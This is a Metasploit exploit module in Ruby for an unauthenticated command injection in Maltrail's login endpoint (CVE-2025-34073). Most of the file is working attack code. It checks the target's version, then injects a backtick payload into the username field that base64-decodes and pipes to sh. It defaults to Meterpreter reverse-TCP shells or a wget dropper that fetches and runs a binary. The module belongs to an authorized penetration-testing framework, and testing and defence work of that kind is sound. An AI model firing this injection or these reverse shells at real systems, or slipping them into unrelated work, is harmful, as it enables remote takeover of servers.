Path: blob/master/modules/exploits/unix/http/maltrail_rce.rb
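##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the Maltrail login command injection (CVE-2025-34073).
#
# The AutoCheck prepend runs #check before #exploit, so the version gate in
# #check is what decides whether the payload is delivered at all.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  # Registers module metadata and the RPORT / TARGETURI options.
  #
  # @param info [Hash] metadata merged by the framework via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Maltrail Unauthenticated Command Injection',
        'Description' => %q{
          Maltrail is a malicious traffic detection system, utilizing publicly
          available blacklists containing malicious and/or generally suspicious trails.
          The Maltrail versions <= 0.54 is suffering from a command injection vulnerability.
          The `subprocess.check_output` function in `mailtrail/core/httpd.py` contains
          a command injection vulnerability in the `params.get("username")` parameter.
          An attacker can exploit this vulnerability by injecting arbitrary OS commands
          into the username parameter. The injected commands will be executed with the
          privileges of the running process. This vulnerability can be exploited remotely
          without authentication.

          Successfully tested against Maltrail versions 0.52 and 0.53.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Ege BALCI <egebalci[at]pm.me>', # msf module
          'Valentin Lobstein', # Add CVE reference + rewrite
          'Chris Wild', # original PoC, analysis
        ],
        # The CVE entry was listed twice in the original reference array; it is
        # kept once here.
        'References' => [
          ['CVE', '2025-34073'],
          ['EDB', '51676'],
          ['URL', 'https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/'],
          ['URL', 'https://github.com/stamparm/maltrail/issues/19146']
        ],
        'Platform' => %w[unix linux],
        'Privileged' => false,
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => :wget,
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DisclosureDate' => '2023-07-31',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => []
        }
      )
    )
    register_options(
      [
        Opt::RPORT(8338),
        OptString.new('TARGETURI', [ true, 'The URI of the Maltrail server', '/'])
      ]
    )
  end

  # Fingerprints the Maltrail version from the landing page and gates on it.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when there is no usable response
  #   or no version string in the body, Appears for versions below 0.54,
  #   Safe otherwise
  def check
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path),
      'method' => 'GET'
    )
    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200

    # The landing page renders the version as "(v<b>X.Y</b>)". Previously a
    # non-matching body left `version` nil and the comparison below raised
    # NoMethodError instead of returning a CheckCode.
    match = res.body.to_s.match(%r{\(v<b>([0-9.]+)</b>\)})
    return CheckCode::Unknown("#{peer} - Could not determine Maltrail version from response body") unless match

    version = Rex::Version.new(match[1])

    # NOTE(review): the module description says "<= 0.54" while this gate
    # reports 0.54 itself as Safe; confirm which boundary is correct.
    return CheckCode::Appears("Version Detected: #{version}") if version < Rex::Version.new('0.54')

    CheckCode::Safe("Version Detected: #{version}")
  end

  # Sends a command through the vulnerable username parameter of the login
  # endpoint (see the module description).
  #
  # @param cmd [String] command to run on the target; base64-encoded in the
  #   request and decoded on the target side
  # @param _opts [Hash] unused; kept for the CmdStager execute_command(cmd, opts) contract
  # @return [Rex::Proto::Http::Response, nil] the HTTP response, or nil on no response
  def execute_command(cmd, _opts = {})
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'login'),
      'method' => 'POST',
      'uri_encode_mode' => 'none',
      'headers' => {
        'ctype' => 'application/x-www-form-urlencoded'
      },
      'data' => "username=;`echo+\"#{Rex::Text.encode_base64(cmd)}\"+|+base64+-d+|+sh;#`"
    )
  end

  # Dispatches on the selected target: the Unix Command target sends the
  # encoded payload directly, the Linux Dropper target goes through the
  # CmdStager mixin, which calls back into #execute_command.
  def exploit
    case target['Type']
    when :unix_cmd
      print_status("Executing #{target.name}...")
      execute_command(payload.encoded)
    when :linux_dropper
      print_status("Executing #{target.name}...")
      execute_cmdstager
    end
  end
end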